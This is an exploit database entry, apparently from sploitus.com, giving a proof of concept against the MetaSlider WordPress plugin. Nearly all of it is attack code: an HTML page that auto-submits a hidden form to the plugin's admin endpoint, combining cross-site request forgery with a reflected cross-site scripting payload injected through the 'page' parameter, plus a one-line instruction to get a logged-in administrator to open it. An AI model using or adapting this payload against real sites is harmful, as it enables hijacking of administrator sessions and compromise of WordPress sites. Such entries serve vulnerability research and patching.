Share
## https://sploitus.com/exploit?id=WPEX-ID:A6E6C67B-7D9B-4FDB-8115-C33ADD7BFC3D
Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=metaslider" method="POST">
        <input type="hidden" name="page" value='"><svg/onload=alert(/XSS/)>'/>
        <input type="submit" name="submit" value="Send" />
    </form>
  </body>
</html>